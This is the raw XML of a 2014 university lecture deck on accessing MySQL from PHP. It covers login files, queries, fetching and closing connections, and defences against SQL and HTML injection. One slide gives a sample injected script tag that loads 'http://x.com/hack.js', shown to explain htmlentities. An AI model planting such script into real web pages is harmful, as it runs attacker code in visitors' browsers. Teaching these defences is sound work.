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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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806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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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359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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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421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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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313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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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6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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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36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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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818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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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896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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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91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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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13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4FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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5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44FFB-958A-40F3-92A5-D5DBB67B1A07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3B9B-7A6F-44E5-B77A-80F4B0ED1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728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Accessing MySQL with PHP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IDIA 618</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Fall 2014</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bridget M. Blodgett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313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Exploits of a M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19300"/>
            <a:ext cx="9159612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3544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Placeholders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way to make a secure code without using the real escape string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Predefine a query using ? characters then pass the user generated data to it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This avoids generating queries and directly inserts the information into the database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How can we alter the book example from earlier to make use of this?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785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Injection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Much like SQL injections having open forms also allows attacks against HTML and JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlentities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> function strips out any HTML markup and replaces them with the more harmless display codes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200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lt;script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='http://x.com/hack.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js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'&amp;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gt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; &amp;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lt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;/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script&amp;gt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;&amp;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lt;script&amp;gt;hack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();&amp;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lt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;/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script&amp;gt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200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="22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417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Querying You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MySQL isn’t picky about what accesses it so long as it provides a valid username and password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The process plays out the same as it would with a console or other application:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to MySQL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select the database to use.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Build a query string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Perform the query.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Retrieve the results and output it to a web page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Repeat Steps 3 to 5 until all desired data have been retrieved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disconnect from MySQL.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202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Login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 is possible to connect to MySQL in each PHP file that requires a database query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But this isn’t the most secure method</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Making one file that does all you connecting works much better</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This file is then included in any other file that must connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The information may need to be altered based upon how your servers are set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664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Login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important thing is to keep the login information within &lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> ?&gt; tags (ideally on a page with no HTML markup at all)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If these aren’t between the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> tags then your login information may be accessible as HTML if someone loads the page</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Much like functions this also makes updates easier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329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Connecting to MySQL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Any file that needs MySQL can now include the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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require_once</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="24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 smtClean="0"/>
              <a:t>mysqli</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>a PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>object and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>requires </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>four pieces </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>of information: server location, username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>password, and database</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>You want to check if a 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returned which signifies that it failed to connect</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Die is a way to show there was an error and pass along the code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="646402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and Executing a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is a built in query function in PHP making it simple to query MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As long as you pass this a well formed query</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This function can only be used to send complete queries, not partial ones</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The results of the query are placed in the $results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>variable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00404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Fetching A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returned results are a resource not plaintext or a string</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is possible to call individual cells that are wanted for the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>However this can require a lot of calls to the results</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fetch_assoc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>be more efficient</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This works by putting each cell in the row into an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>array labeled with the column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611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a Connection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never want to leave a connection hanging open it uses up valuable resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>If you keep opening connections on your pages and not closing them you risk crashing your server(s)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close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dirty="0" smtClean="0"/>
              <a:t>function does this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>effectively for connections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Courier" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> works on results from a query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612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Integrating PHP and MySQL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basic queries can be combined or sub-nested to perform multiple queries in nested PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Always make sure to clean up any user input to prevent SQL injection errors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>There are many types of escape characters that can execute </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2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mysql_real_escape_string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can prevent this problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20733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603</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show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Accessing MySQL with PHP</vt:lpstr>
      <vt:lpstr>Querying You Database</vt:lpstr>
      <vt:lpstr>Login File</vt:lpstr>
      <vt:lpstr>Login File</vt:lpstr>
      <vt:lpstr>Connecting to MySQL</vt:lpstr>
      <vt:lpstr>Building and Executing a Query</vt:lpstr>
      <vt:lpstr>Fetching A Result</vt:lpstr>
      <vt:lpstr>Closing a Connection</vt:lpstr>
      <vt:lpstr>Integrating PHP and MySQL</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Placeholders</vt:lpstr>
      <vt:lpstr>HTML Injection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Accessing MySQL with PHP</dc:title>
  <dc:creator>Bridget Blodgett</dc:creator>
  <cp:lastModifiedBy>Bridget Blodgett</cp:lastModifiedBy>
  <cp:revision>11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2012-04-10T21:45:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2014-10-30T18:25:27Z</dcterms:modified>
</cp:coreProperties>
</file>